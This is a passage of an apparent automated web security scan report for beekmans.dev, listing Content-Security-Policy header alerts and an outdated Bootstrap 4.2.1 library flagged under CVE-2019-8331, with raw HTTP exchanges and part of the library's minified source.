          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a33afbea4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        7. GET https://beekmans.dev/robots.txt
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (203 bytes)
          GET https://beekmans.dev/robots.txt HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1056 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:55:12 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: EXPIRED
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wn2lexkhyyUNMM7lYDUd9LP2tnrj3tMIrJSVfiu57RcdFZ6t%2FNNbXhaoKlGwl4GLSjws6PCflQkaxyotsdcW1zU52wy0XFNadtE52aj5Q7P8e9F9XZNyEHiRuHUYsc4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a32429aa4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        8. GET https://beekmans.dev/sitemap.xml
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (204 bytes)
          GET https://beekmans.dev/sitemap.xml HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1024 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:55:12 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zuRExiVS36cod0SzwgtropR3qd8TNCoj49V39ZbKU3AIjdAVWtDduAO17J8nZOQvQqgLgbMLeojC7iTBFWn4UwpRgx1eFhxWTrk5bjAiTuyUBlz1chvxVKvbc9x0IUw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a3252bc84c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

        9. GET https://beekmans.dev/SOURCE
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (230 bytes)
          GET https://beekmans.dev/SOURCE HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1036 bytes)
          HTTP/1.1 404 Not Found
          Date: Mon, 06 Dec 2021 09:56:08 GMT
          Content-Type: text/html; charset=iso-8859-1
          Connection: keep-alive
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q6%2Fd%2FWQCYkfqiF3MUbvhkfMd%2FoRE2rCvpi2yqkw8kVQekenwV%2FAVutswe6cG2t9Iai00cUfsCGsxas1YuKjKp%2FvvWb6IyQEtrAvqRYaa%2BHqf2efavomKKW3lskoOXCg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a4801eba0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (275 bytes)
          <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
          <html><head>
          <title>404 Not Found</title>
          </head><body>
          <h1>Not Found</h1>
          <p>The requested URL was not found on this server.</p>
          <hr>
          <address>Apache/2.4.29 (Ubuntu) Server at beekmans.dev Port 443</address>
          </body></html>
          
          Evidence
          default-src 'self' http: https: data: blob: 'unsafe-inline'
          Solution

          Ensure that your web server, application server, load balancer, etc. is properly configured to set the Content-Security-Policy header.

      2. Vulnerable JS Library (2)
        1. GET https://beekmans.dev/vendor/bootstrap/js/bootstrap.bundle.min.js
          Alert tags
          Alert description

          The identified library bootstrap, version 4.2.1 is vulnerable.

          Other info

          CVE-2019-8331

          Request
          Request line and header section (268 bytes)
          GET https://beekmans.dev/vendor/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1167 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:05 GMT
          Content-Type: application/javascript; charset=utf-8
          Connection: keep-alive
          last-modified: Fri, 15 Mar 2019 09:41:20 GMT
          etag: W/"12a14-5841ed7589c5e-gzip"
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X6LhT7okCjllVCP1Debg47TkxjsLU%2BAqDS7v8sknBxY5o2m9Ygyx0s90hdU5OCh%2FXSjwS6UI6ZiNrZUQ%2F%2B8nGq9IcDtldgElywhYK4RTL6EzydKEG1Gtt%2B5HuO9pZEU%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a46ebad10c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (76308 bytes)
          /*!
            * Bootstrap v4.2.1 (https://getbootstrap.com/)
            * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors)
            * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
            */
          !function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery")):"function"==typeof define&&define.amd?define(["exports","jquery"],e):e(t.bootstrap={},t.jQuery)}(this,function(t,p){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescriptor(r,t).enumerable}))),e.forEach(function(t){var e,n,i;e=o,i=r[n=t],n in e?Object.defineProperty(e,n,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[n]=i})}return o}p=p&&p.hasOwnProperty("default")?p.default:p;var e="transitionend";function n(t){var e=this,n=!1;return p(this).one(m.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||m.triggerTransitionEnd(e)},t),this}var m={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),document.getElementById(t););return t},getSelectorFromElement:function(t){var e=t.getAttribute("data-target");if(!e||"#"===e){var n=t.getAttribute("href");e=n&&"#"!==n?n.trim():""}return e&&document.querySelector(e)?e:null},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=p(t).css("transition-duration"),n=p(t).css("transition-delay"),i=parseFloat(e),o=parseFloat(n);return i||o?(e=e.split(",")[0],n=n.split(",")[0],1e3*(parseFloat(e)+parseFloat(n))):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){p(t).trigger(e)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var i in n)if(Object.prototype.hasOwnProperty.call(n,i)){var o=n[i],r=e[i],s=r&&m.isElement(r)?"element":(a=r,{}.toString.call(a).match(/\s([a-z]+)/i)[1].toLowerCase());if(!new RegExp(o).test(s))throw new Error(t.toUpperCase()+': Option "'+i+'" provided type "'+s+'" but expected type "'+o+'".')}var a},findShadowRoot:function(t){if(!document.documentElement.attachShadow)return null;if("function"!=typeof t.getRootNode)return t instanceof ShadowRoot?t:t.parentNode?m.findShadowRoot(t.parentNode):null;var e=t.getRootNode();return e instanceof ShadowRoot?e:null}};p.fn.emulateTransitionEnd=n,p.event.special[m.TRANSITION_END]={bindType:e,delegateType:e,handle:function(t){if(p(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var o="alert",r="bs.alert",a="."+r,c=p.fn[o],h={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},u="alert",f="fade",d="show",g=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=this._getRootElement(t)),this._triggerCloseEvent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){p.removeData(this._element,r),this._element=null},t._getRootElement=function(t){var e=m.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=p(t).closest("."+u)[0]),n},t._triggerCloseEvent=function(t){var e=p.Event(h.CLOSE);return p(t).trigger(e),e},t._removeElement=function(e){var n=this;if(p(e).removeClass(d),p(e).hasClass(f)){var t=m.getTransitionDurationFromElement(e);p(e).one(m.TRANSITION_END,function(t){return n._destroyElement(e,t)}).emulateTransitionEnd(t)}else this._destroyElement(e)},t._destroyElement=function(t){p(t).detach().trigger(h.CLOSED).remove()},i._jQueryInterface=function(n){return this.each(function(){var t=p(this),e=t.data(r);e||(e=new i(this),t.data(r,e)),"close"===n&&e[n](this)})},i._handleDismiss=function(e){return function(t){t&&t.preventDefault(),e.close(this)}},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}}]),i}();p(document).on(h.CLICK_DATA_API,'[data-dismiss="alert"]',g._handleDismiss(new g)),p.fn[o]=g._jQueryInterface,p.fn[o].Constructor=g,p.fn[o].noConflict=function(){return p.fn[o]=c,g._jQueryInterface};var _="button",v="bs.button",y="."+v,E=".data-api",b=p.fn[_],w="active",T="btn",C="focus",S='[data-toggle^="button"]',D='[data-toggle="buttons"]',I='input:not([type="hidden"])',A=".active",O=".btn",N={CLICK_DATA_API:"click"+y+E,FOCUS_BLUR_DATA_API:"focus"+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=p(this._element).closest(D)[0];if(n){var i=this._element.querySelector(I);if(i){if("radio"===i.type)if(i.checked&&this._element.classList.contains(w))t=!1;else{var o=n.querySelector(A);o&&p(o).removeClass(w)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!this._element.classList.contains(w),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!this._element.classList.contains(w)),t&&p(this._element).toggleClass(w)},t.dispose=function(){p.removeData(this._element,v),this._element=null},n._jQueryInterface=function(e){return this.each(function(){var t=p(this).data(v);t||(t=new n(this),p(this).data(v,t)),"toggle"===e&&t[e]()})},s(n,null,[{key:"VERSION",get:function(){return"4.2.1"}}]),n}();p(document).on(N.CLICK_DATA_API,S,function(t){t.preventDefault();var e=t.target;p(e).hasClass(T)||(e=p(e).closest(O)),k._jQueryInterface.call(p(e),"toggle")}).on(N.FOCUS_BLUR_DATA_API,S,function(t){var e=p(t.target).closest(O)[0];p(e).toggleClass(C,/^focus(in)?$/.test(t.type))}),p.fn[_]=k._jQueryInterface,p.fn[_].Constructor=k,p.fn[_].noConflict=function(){return p.fn[_]=b,k._jQueryInterface};var L="carousel",P="bs.carousel",x="."+P,H=".data-api",j=p.fn[L],R={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0,touch:!0},F={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},M="next",W="prev",U="left",B="right",q={SLIDE:"slide"+x,SLID:"slid"+x,KEYDOWN:"keydown"+x,MOUSEENTER:"mouseenter"+x,MOUSELEAVE:"mouseleave"+x,TOUCHSTART:"touchstart"+x,TOUCHMOVE:"touchmove"+x,TOUCHEND:"touchend"+x,POINTERDOWN:"pointerdown"+x,POINTERUP:"pointerup"+x,DRAG_START:"dragstart"+x,LOAD_DATA_API:"load"+x+H,CLICK_DATA_API:"click"+x+H},K="carousel",Q="active",Y="slide",V="carousel-item-right",X="carousel-item-left",z="carousel-item-next",G="carousel-item-prev",J="pointer-event",Z=".active",$=".active.carousel-item",tt=".carousel-item",et=".carousel-item img",nt=".carousel-item-next, .carousel-item-prev",it=".carousel-indicators",ot="[data-slide], [data-slide-to]",rt='[data-ride="carousel"]',st={TOUCH:"touch",PEN:"pen"},at=function(){function r(t,e){this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!1,this._isSliding=!1,this.touchTimeout=null,this.touchStartX=0,this.touchDeltaX=0,this._config=this._getConfig(e),this._element=t,this._indicatorsElement=this._element.querySelector(it),this._touchSupported="ontouchstart"in document.documentElement||0<navigator.maxTouchPoints,this._pointerEvent=Boolean(window.PointerEvent||window.MSPointerEvent),this._addEventListeners()}var t=r.prototype;return t.next=function(){this._isSliding||this._slide(M)},t.nextWhenVisible=function(){!document.hidden&&p(this._element).is(":visible")&&"hidden"!==p(this._element).css("visibility")&&this.next()},t.prev=function(){this._isSliding||this._slide(W)},t.pause=function(t){t||(this._isPaused=!0),this._element.querySelector(nt)&&(m.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},t.to=function(t){var e=this;this._activeElement=this._element.querySelector($);var n=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)p(this._element).one(q.SLID,function(){return e.to(t)});else{if(n===t)return this.pause(),void this.cycle();var i=n<t?M:W;this._slide(i,this._items[t])}},t.dispose=function(){p(this._element).off(x),p.removeData(this._element,P),this._items=null,this._config=null,this._element=null,this._interval=null,this._isPaused=null,this._isSliding=null,this._activeElement=null,this._indicatorsElement=null},t._getConfig=function(t){return t=l({},R,t),m.typeCheckConfig(L,t,F),t},t._handleSwipe=function(){var t=Math.abs(this.touchDeltaX);if(!(t<=40)){var e=t/this.touchDeltaX;0<e&&this.prev(),e<0&&this.next()}},t._addEventListeners=function(){var e=this;this._config.keyboard&&p(this._element).on(q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&p(this._element).on(q.MOUSEENTER,function(t){return e.pause(t)}).on(q.MOUSELEAVE,function(t){return e.cycle(t)}),this._addTouchEventListeners()},t._addTouchEventListeners=function(){var n=this;if(this._touchSupported){var e=function(t){n._pointerEvent&&st[t.originalEvent.pointerType.toUpperCase()]?n.touchStartX=t.originalEvent.clientX:n._pointerEvent||(n.touchStartX=t.originalEvent.touches[0].clientX)},i=function(t){n._pointerEvent&&st[t.originalEvent.pointerType.toUpperCase()]&&(n.touchDeltaX=t.originalEvent.clientX-n.touchStartX),n._handleSwipe(),"hover"===n._config.pause&&(n.pause(),n.touchTimeout&&clearTimeout(n.touchTimeout),n.touchTimeout=setTimeout(function(t){return n.cycle(t)},500+n._config.interval))};p(this._element.querySelectorAll(et)).on(q.DRAG_START,function(t){return t.preventDefault()}),this._pointerEvent?(p(this._element).on(q.POINTERDOWN,function(t){return e(t)}),p(this._element).on(q.POINTERUP,function(t){return i(t)}),this._element.classList.add(J)):(p(this._element).on(q.TOUCHSTART,function(t){return e(t)}),p(this._element).on(q.TOUCHMOVE,function(t){var e;(e=t).originalEvent.touches&&1<e.originalEvent.touches.length?n.touchDeltaX=0:n.touchDeltaX=e.originalEvent.touches[0].clientX-n.touchStartX}),p(this._element).on(q.TOUCHEND,function(t){return i(t)}))}},t._keydown=function(t){if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},t._getItemIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(tt)):[],this._items.indexOf(t)},t._getItemByDirection=function(t,e){var n=t===M,i=t===W,o=this._getItemIndex(e),r=this._items.length-1;if((i&&0===o||n&&o===r)&&!this._config.wrap)return e;var s=(o+(t===W?-1:1))%this._items.length;return-1===s?this._items[this._items.length-1]:this._items[s]},t._triggerSlideEvent=function(t,e){var n=this._getItemIndex(t),i=this._getItemIndex(this._element.querySelector($)),o=p.Event(q.SLIDE,{relatedTarget:t,direction:e,from:i,to:n});return p(this._element).trigger(o),o},t._setActiveIndicatorElement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll(Z));p(e).removeClass(Q);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&p(n).addClass(Q)}},t._slide=function(t,e){var n,i,o,r=this,s=this._element.querySelector($),a=this._getItemIndex(s),l=e||s&&this._getItemByDirection(t,s),c=this._getItemIndex(l),h=Boolean(this._interval);if(o=t===M?(n=X,i=z,U):(n=V,i=G,B),l&&p(l).hasClass(Q))this._isSliding=!1;else if(!this._triggerSlideEvent(l,o).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorElement(l);var u=p.Event(q.SLID,{relatedTarget:l,direction:o,from:a,to:c});if(p(this._element).hasClass(Y)){p(l).addClass(i),m.reflow(l),p(s).addClass(n),p(l).addClass(n);var f=parseInt(l.getAttribute("data-interval"),10);this._config.interval=f?(this._config.defaultInterval=this._config.defaultInterval||this._config.interval,f):this._config.defaultInterval||this._config.interval;var d=m.getTransitionDurationFromElement(s);p(s).one(m.TRANSITION_END,function(){p(l).removeClass(n+" "+i).addClass(Q),p(s).removeClass(Q+" "+i+" "+n),r._isSliding=!1,setTimeout(function(){return p(r._element).trigger(u)},0)}).emulateTransitionEnd(d)}else p(s).removeClass(Q),p(l).addClass(Q),this._isSliding=!1,p(this._element).trigger(u);h&&this.cycle()}},r._jQueryInterface=function(i){return this.each(function(){var t=p(this).data(P),e=l({},R,p(this).data());"object"==typeof i&&(e=l({},e,i));var n="string"==typeof i?i:e.slide;if(t||(t=new r(this,e),p(this).data(P,t)),"number"==typeof i)t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},r._dataApiClickHandler=function(t){var e=m.getSelectorFromElement(this);if(e){var n=p(e)[0];if(n&&p(n).hasClass(K)){var i=l({},p(n).data(),p(this).data()),o=this.getAttribute("data-slide-to");o&&(i.interval=!1),r._jQueryInterface.call(p(n),i),o&&p(n).data(P).to(o),t.preventDefault()}}},s(r,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return R}}]),r}();p(document).on(q.CLICK_DATA_API,ot,at._dataApiClickHandler),p(window).on(q.LOAD_DATA_API,function(){for(var t=[].slice.call(document.querySelectorAll(rt)),e=0,n=t.length;e<n;e++){var i=p(t[e]);at._jQueryInterface.call(i,i.data())}}),p.fn[L]=at._jQueryInterface,p.fn[L].Constructor=at,p.fn[L].noConflict=function(){return p.fn[L]=j,at._jQueryInterface};var lt="collapse",ct="bs.collapse",ht="."+ct,ut=p.fn[lt],ft={toggle:!0,parent:""},dt={toggle:"boolean",parent:"(string|element)"},pt={SHOW:"show"+ht,SHOWN:"shown"+ht,HIDE:"hide"+ht,HIDDEN:"hidden"+ht,CLICK_DATA_API:"click"+ht+".data-api"},mt="show",gt="collapse",_t="collapsing",vt="collapsed",yt="width",Et="height",bt=".show, .collapsing",wt='[data-toggle="collapse"]',Tt=function(){function a(e,t){this._isTransitioning=!1,this._element=e,this._config=this._getConfig(t),this._triggerArray=[].slice.call(document.querySelectorAll('[data-toggle="collapse"][href="#'+e.id+'"],[data-toggle="collapse"][data-target="#'+e.id+'"]'));for(var n=[].slice.call(document.querySelectorAll(wt)),i=0,o=n.length;i<o;i++){var r=n[i],s=m.getSelectorFromElement(r),a=[].slice.call(document.querySelectorAll(s)).filter(function(t){return t===e});null!==s&&0<a.length&&(this._selector=s,this._triggerArray.push(r))}this._parent=this._config.parent?this._getParent():null,this._config.parent||this._addAriaAndCollapsedClass(this._element,this._triggerArray),this._config.toggle&&this.toggle()}var t=a.prototype;return t.toggle=function(){p(this._element).hasClass(mt)?this.hide():this.show()},t.show=function(){var t,e,n=this;if(!this._isTransitioning&&!p(this._element).hasClass(mt)&&(this._parent&&0===(t=[].slice.call(this._parent.querySelectorAll(bt)).filter(function(t){return"string"==typeof n._config.parent?t.getAttribute("data-parent")===n._config.parent:t.classList.contains(gt)})).length&&(t=null),!(t&&(e=p(t).not(this._selector).data(ct))&&e._isTransitioning))){var i=p.Event(pt.SHOW);if(p(this._element).trigger(i),!i.isDefaultPrevented()){t&&(a._jQueryInterface.call(p(t).not(this._selector),"hide"),e||p(t).data(ct,null));var o=this._getDimension();p(this._element).removeClass(gt).addClass(_t),this._element.style[o]=0,this._triggerArray.length&&p(this._triggerArray).removeClass(vt).attr("aria-expanded",!0),this.setTransitioning(!0);var r="scroll"+(o[0].toUpperCase()+o.slice(1)),s=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,function(){p(n._element).removeClass(_t).addClass(gt).addClass(mt),n._element.style[o]="",n.setTransitioning(!1),p(n._element).trigger(pt.SHOWN)}).emulateTransitionEnd(s),this._element.style[o]=this._element[r]+"px"}}},t.hide=function(){var t=this;if(!this._isTransitioning&&p(this._element).hasClass(mt)){var e=p.Event(pt.HIDE);if(p(this._element).trigger(e),!e.isDefaultPrevented()){var n=this._getDimension();this._element.style[n]=this._element.getBoundingClientRect()[n]+"px",m.reflow(this._element),p(this._element).addClass(_t).removeClass(gt).removeClass(mt);var i=this._triggerArray.length;if(0<i)for(var o=0;o<i;o++){var r=this._triggerArray[o],s=m.getSelectorFromElement(r);if(null!==s)p([].slice.call(document.querySelectorAll(s))).hasClass(mt)||p(r).addClass(vt).attr("aria-expanded",!1)}this.setTransitioning(!0);this._element.style[n]="";var a=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,function(){t.setTransitioning(!1),p(t._element).removeClass(_t).addClass(gt).trigger(pt.HIDDEN)}).emulateTransitionEnd(a)}}},t.setTransitioning=function(t){this._isTransitioning=t},t.dispose=function(){p.removeData(this._element,ct),this._config=null,this._parent=null,this._element=null,this._triggerArray=null,this._isTransitioning=null},t._getConfig=function(t){return(t=l({},ft,t)).toggle=Boolean(t.toggle),m.typeCheckConfig(lt,t,dt),t},t._getDimension=function(){return p(this._element).hasClass(yt)?yt:Et},t._getParent=function(){var t,n=this;m.isElement(this._config.parent)?(t=this._config.parent,"undefined"!=typeof this._config.parent.jquery&&(t=this._config.parent[0])):t=document.querySelector(this._config.parent);var e='[data-toggle="collapse"][data-parent="'+this._config.parent+'"]',i=[].slice.call(t.querySelectorAll(e));return p(i).each(function(t,e){n._addAriaAndCollapsedClass(a._getTargetFromElement(e),[e])}),t},t._addAriaAndCollapsedClass=function(t,e){var n=p(t).hasClass(mt);e.length&&p(e).toggleClass(vt,!n).attr("aria-expanded",n)},a._getTargetFromElement=function(t){var e=m.getSelectorFromElement(t);return e?document.querySelector(e):null},a._jQueryInterface=function(i){return this.each(function(){var t=p(this),e=t.data(ct),n=l({},ft,t.data(),"object"==typeof i&&i?i:{});if(!e&&n.toggle&&/show|hide/.test(i)&&(n.toggle=!1),e||(e=new a(this,n),t.data(ct,e)),"string"==typeof i){if("undefined"==typeof e[i])throw new TypeError('No method named "'+i+'"');e[i]()}})},s(a,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return ft}}]),a}();p(document).on(pt.CLICK_DATA_API,wt,function(t){"A"===t.currentTarget.tagName&&t.preventDefault();var n=p(this),e=m.getSelectorFromElement(this),i=[].slice.call(document.querySelectorAll(e));p(i).each(function(){var t=p(this),e=t.data(ct)?"toggle":n.data();Tt._jQueryInterface.call(t,e)})}),p.fn[lt]=Tt._jQueryInterface,p.fn[lt].Constructor=Tt,p.fn[lt].noConflict=function(){return p.fn[lt]=ut,Tt._jQueryInterface};for(var Ct="undefined"!=typeof window&&"undefined"!=typeof document,St=["Edge","Trident","Firefox"],Dt=0,It=0;It<St.length;It+=1)if(Ct&&0<=navigator.userAgent.indexOf(St[It])){Dt=1;break}var At=Ct&&window.Promise?function(t){var e=!1;return function(){e||(e=!0,window.Promise.resolve().then(function(){e=!1,t()}))}}:function(t){var e=!1;return function(){e||(e=!0,setTimeout(function(){e=!1,t()},Dt))}};function Ot(t){return t&&"[object Function]"==={}.toString.call(t)}function Nt(t,e){if(1!==t.nodeType)return[];var n=t.ownerDocument.defaultView.getComputedStyle(t,null);return e?n[e]:n}function kt(t){return"HTML"===t.nodeName?t:t.parentNode||t.host}function Lt(t){if(!t)return document.body;switch(t.nodeName){case"HTML":case"BODY":return t.ownerDocument.body;case"#document":return t.body}var 